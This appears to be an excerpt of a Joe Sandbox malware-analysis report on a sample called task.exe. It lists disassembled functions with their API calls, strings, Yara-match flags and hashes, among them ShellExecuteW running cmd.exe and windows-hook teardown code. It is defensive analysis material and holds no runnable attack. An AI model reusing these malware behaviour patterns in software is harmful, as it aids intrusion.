                                                                                                                                                                • String ID: C:\Users\user\task.exe
                                                                                                                                                                • API String ID: 2506810119-325489873
                                                                                                                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                Function 6FEA5330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(-00000003,6FE7AFD9,?,?,\o(), ref: 6FEA535D
                                                                                                                                                                • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(00000005,6FE7AFD9,?,?,\o(), ref: 6FEA539B
                                                                                                                                                                • WakeByAddressAll.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001,?,?,\o(), ref: 6FEA53AF
                                                                                                                                                                Strings
                                                                                                                                                                • assertion failed: is_unlocked(state)\o(, xrefs: 6FEA53BF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressWake$Single
                                                                                                                                                                • String ID: assertion failed: is_unlocked(state)\o(
                                                                                                                                                                • API String ID: 1135737206-940078219
                                                                                                                                                                • Opcode ID: 75176f0507fc5f40beb08977374fabdb840b51697ccaf1dba3b38550cdedb671
                                                                                                                                                                • Instruction ID: 765d482af001bd1ddd38442d132ece6c985fecc027b6c772e91c0e5fa8b8b49e
                                                                                                                                                                • Opcode Fuzzy Hash: 75176f0507fc5f40beb08977374fabdb840b51697ccaf1dba3b38550cdedb671
                                                                                                                                                                • Instruction Fuzzy Hash: 3201B930114B165FDF160A5CA84034F7AA4EF8A72EF21447EF58ECF740CE66A48687C1
                                                                                                                                                                Function 0006527B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00065276), ref: 00065292
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 000652E9
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 000652F8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                • String ID: Connection Timeout
                                                                                                                                                                • API String ID: 2055531096-499159329
                                                                                                                                                                • Opcode ID: d18cdaa4ce7874000fdb1fefa6c41e15ac14bae1fe6860ebdc601cd300aaa7b6
                                                                                                                                                                • Instruction ID: f91f54ee8b622cea4817561f2775eead62d48d37398fa12a7ac6ef66c17df712
                                                                                                                                                                • Opcode Fuzzy Hash: d18cdaa4ce7874000fdb1fefa6c41e15ac14bae1fe6860ebdc601cd300aaa7b6
                                                                                                                                                                • Instruction Fuzzy Hash: D601F771640F419FB725AB35CCA64AEBBE2FF06306B040A2DE1C342A73CA659400CB55
                                                                                                                                                                Function 6FE95312 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6FE952C3,00000000,?,00000001,?,?,?,6FE953B2,00000001,FlsFree,6FEB1940,FlsFree), ref: 6FE9531F
                                                                                                                                                                • GetLastError.KERNEL32(?,6FE952C3,00000000,?,00000001,?,?,?,6FE953B2,00000001,FlsFree,6FEB1940,FlsFree,00000000,?,6FE94234), ref: 6FE95329
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6FE95351
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                • Opcode ID: 99506dea1ee6ec9072482542dd5e40b2c5247fc4ea5093ede312c395f7c7688a
                                                                                                                                                                • Instruction ID: 3cb34e2f9f790900c58dbbabdb4e4fd96bd7e4c4a9677067c2790febe5b579b8
                                                                                                                                                                • Opcode Fuzzy Hash: 99506dea1ee6ec9072482542dd5e40b2c5247fc4ea5093ede312c395f7c7688a
                                                                                                                                                                • Instruction Fuzzy Hash: 00E0D831244304B7EF101E65CC06B0C3F659F03B65F204024FA0CE81E1D7B6A962C590
                                                                                                                                                                Function 00074433 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00074475
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExecuteShell
                                                                                                                                                                • String ID: /C $cmd.exe$open
                                                                                                                                                                • API String ID: 587946157-3896048727
                                                                                                                                                                • Opcode ID: d0b2c6655d7fe16c506042d3ef96ab3f938f19a5e64d9d57815b791c8cae47bd
                                                                                                                                                                • Instruction ID: 7e8bea652a727a85a5df462c4ca0dc3567957c533a3af9db71521f69f24e214c
                                                                                                                                                                • Opcode Fuzzy Hash: d0b2c6655d7fe16c506042d3ef96ab3f938f19a5e64d9d57815b791c8cae47bd
                                                                                                                                                                • Instruction Fuzzy Hash: AAE0C9B02082056A8708EBA0DC96DFF72AEAFA4305B59482CB14652593EF789E098715
                                                                                                                                                                Function 0006B45C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • TerminateThread.KERNEL32(00069E0E,00000000,000D22B8,pth_unenc,0006CA8C,00000000,0006E356), ref: 0006B46B
                                                                                                                                                                • UnhookWindowsHookEx.USER32(000D20B8), ref: 0006B477
                                                                                                                                                                • TerminateThread.KERNEL32(00069DF3,00000000), ref: 0006B485
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                • String ID: pth_unenc
                                                                                                                                                                • API String ID: 3123878439-4028850238
                                                                                                                                                                • Opcode ID: 43f59e3d7667e749e060213de0b77a8885e5c9d8caf44967cab513df0b778766
                                                                                                                                                                • Instruction ID: 0914e29086bf7e8e16a81cfc840101211b84cae62e91b3a8516efd0ca3f7685c
                                                                                                                                                                • Opcode Fuzzy Hash: 43f59e3d7667e749e060213de0b77a8885e5c9d8caf44967cab513df0b778766
                                                                                                                                                                • Instruction Fuzzy Hash: 72E01271309655EFF3205F649C98875BAEFEB05785314453DF2C285251CBBB4C508B50
                                                                                                                                                                Function 6FE80380 Relevance: 6.4, APIs: 5, Instructions: 130COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001), ref: 6FE803BE
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001), ref: 6FE803E2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 6FE80440
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6FE804A1
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6FE804C3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: 5cb5a829b6c7c91b4b14bd3beb57ea282fa9f976c486d857cf7578f6fe36b20a
                                                                                                                                                                • Instruction ID: 7e11fe780ea07ee0fddde26e91f43fab4ff5b9772fa1ee8584cb8fd3538510d1
                                                                                                                                                                • Opcode Fuzzy Hash: 5cb5a829b6c7c91b4b14bd3beb57ea282fa9f976c486d857cf7578f6fe36b20a
                                                                                                                                                                • Instruction Fuzzy Hash: 3E4108B0A416048FDB14AF68E845BAE7FB5FF47319F24152AE929EB380DB309840CB50
                                                                                                                                                                Function 025953EC Relevance: 6.4, APIs: 4, Instructions: 370COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: 5ec79b263cdc3f396cfa3df65f470d5dd3eef2ab1e7a1e65c7e05f4884c459bd
                                                                                                                                                                • Instruction ID: 0d1e1fe1b447e500c86631a8800407428b27ca7bf00df798717012897770af83
                                                                                                                                                                • Opcode Fuzzy Hash: 5ec79b263cdc3f396cfa3df65f470d5dd3eef2ab1e7a1e65c7e05f4884c459bd
                                                                                                                                                                • Instruction Fuzzy Hash: 44C127719042569FDF22EF68CC80BBA7FAAFF82314F94419AD4849B251F7718E11CB58
                                                                                                                                                                Function 6FE80280 Relevance: 6.4, APIs: 5, Instructions: 102COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,00000000,?,00000004,00000010,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE80292
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,00000010,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE802B8
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE802CE
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE8030D
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE80348
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: e07052054938ad7b512e6010ea29fe3e7557dd54f99814fca519e2d79606d102
                                                                                                                                                                • Instruction ID: 5afc7abeca2a1b497deacb5bc68b169c05a567afaca605b7977e04002a0f3a10
                                                                                                                                                                • Opcode Fuzzy Hash: e07052054938ad7b512e6010ea29fe3e7557dd54f99814fca519e2d79606d102
                                                                                                                                                                • Instruction Fuzzy Hash: 50216E717066015FEB11176CA845B993F999BC3329F28446BF66DCB3C1DB62D4508321
                                                                                                                                                                Function 6FE9CC04 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(8C5F75A1,00000000,00000000,?), ref: 6FE9CC67
                                                                                                                                                                  • Part of subcall function 6FE9C276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FEA11FF,?,00000000,-00000008), ref: 6FE9C2D7
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6FE9CEB9
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6FE9CEFF
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE9CFA2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                • Opcode ID: b2f679e930c43d216fda57dcbe6f00b5819416bf305fd1a3051da940a0661ff4
                                                                                                                                                                • Instruction ID: b35314b46c559b7f26633bbad2f069b2139b82c35082521bc23fd7ec3f71c48b
                                                                                                                                                                • Opcode Fuzzy Hash: b2f679e930c43d216fda57dcbe6f00b5819416bf305fd1a3051da940a0661ff4
                                                                                                                                                                • Instruction Fuzzy Hash: CCD15B75E04649AFCB01DFA8C8809EDBFF5FF49314F24412AE466AB351D730A946CB60
                                                                                                                                                                Function 02597940 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1036877536-0
                                                                                                                                                                • Opcode ID: 2d376f2826970ee9c1bc0c142abbfc6f4b1a02a128c36b00186c1c80ddbe8d0f
                                                                                                                                                                • Instruction ID: 07f139ececc517a469c584e3b6bce374a8b380bf0cfdc438c2ae8569d6d517d2
                                                                                                                                                                • Opcode Fuzzy Hash: 2d376f2826970ee9c1bc0c142abbfc6f4b1a02a128c36b00186c1c80ddbe8d0f
                                                                                                                                                                • Instruction Fuzzy Hash: CCA138B29203869FEF218F28C8917AEFFA6FF59314F1445ABD5859B241E3348941CB58
                                                                                                                                                                Function 02598C90 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c6e78087a6074374e60cb7cf25c28b241ee19c93e337e705e7d1dca0f62e355b
                                                                                                                                                                • Instruction ID: b2a6196daefac59f9116d4520a1fc8e22ef6c5bf146b466421d04e2093e4de29
                                                                                                                                                                • Opcode Fuzzy Hash: c6e78087a6074374e60cb7cf25c28b241ee19c93e337e705e7d1dca0f62e355b
                                                                                                                                                                • Instruction Fuzzy Hash: F3C10370D0425A9FDF11DFA8C884BBDBFB6BF4A300F184189E415A7392C7719941CB69
                                                                                                                                                                Function 6FE9423F Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                • Opcode ID: f3370491d4d9212630e304e73714ee1519e43b06782d75c99d004e0263f77fbf
                                                                                                                                                                • Instruction ID: 5be6cf005ac2b1dbdf97945bac92624a4508c2899d66c82a33f1b4f466ed986c
                                                                                                                                                                • Opcode Fuzzy Hash: f3370491d4d9212630e304e73714ee1519e43b06782d75c99d004e0263f77fbf
                                                                                                                                                                • Instruction Fuzzy Hash: 7C519D72904706AFEB19CF64D940BAA7FA4FF45318F30862FE96546690D732F941CBA0
                                                                                                                                                                Function 0258F13C Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2250ecd4fbdf91485276d935d35989a57b56f6bc7815a8c7b387504c4642240b
                                                                                                                                                                • Instruction ID: f5159dfd9cdf6ed59a0c6ce1aa793dc479d5a191cbf8be4078553f1ac1c8dbd1
                                                                                                                                                                • Opcode Fuzzy Hash: 2250ecd4fbdf91485276d935d35989a57b56f6bc7815a8c7b387504c4642240b
                                                                                                                                                                • Instruction Fuzzy Hash: 1F41E772600705AFD724BF78CC41B6E7BEAFBCC710F50462AE516EBA80D7B195418B94
                                                                                                                                                                Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                Function 6FE9AE81 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6FE9C276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FEA11FF,?,00000000,-00000008), ref: 6FE9C2D7
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE9AEE5
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6FE9AEEC
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6FE9AF26
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6FE9AF2D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
